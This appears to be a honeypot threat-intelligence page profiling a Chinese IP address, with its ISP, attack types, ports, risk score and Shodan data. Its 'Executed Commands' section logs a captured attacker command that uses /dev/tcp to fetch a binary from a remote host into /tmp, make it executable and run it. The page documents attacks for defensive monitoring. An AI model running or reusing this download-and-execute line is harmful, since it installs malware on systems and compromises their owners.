TROYANOSYVIRUS
Active ThreatLOW

111.228.49.188

Country of Origin🇨🇳 China
First Detection4/21/2026
Last Activity4/21/2026
ISPChina Telecom Beijing Tianjin Hebei Big Data Industry Park Branch
🎯
32
Total Attacks
🔌
2
Ports
📡
2
Attack Types
🦠
1
Malware

Geolocation

Country
🇨🇳 China
City
Unknown
ASN
AS141679
ISP
China Telecom Beijing Tianjin Hebei Big Data Industry Park Branch

Attack Types

ssh_telnet_honeypot
redis_honeypot

Attacked Ports

226379

Associated Malware

Executed Commands

$nohup bash -c "exec 6<>/dev/tcp/203.57.109.214/60114 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/dtNIsqyZpB && chmod +x /tmp/dtNIsqyZpB && /tmp/dtNIsqyZpB /n0cXTj28PL2Ol0Xc4GCaRRbO+n08fg6XB9zgYFlAFky9vT94DFbHmyChn0cXTj28PL2Ol0Xc4GCaRRbO+n08WzeZFCLuOksYIA9SoPfkJ4=" &1x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports
22300118789
CPEs
cpe:/a:openbsd:openssh:8.9p1cpe:/o:canonical:ubuntu_linux

Risk Assessment

35
/100
LowMediumHighCritical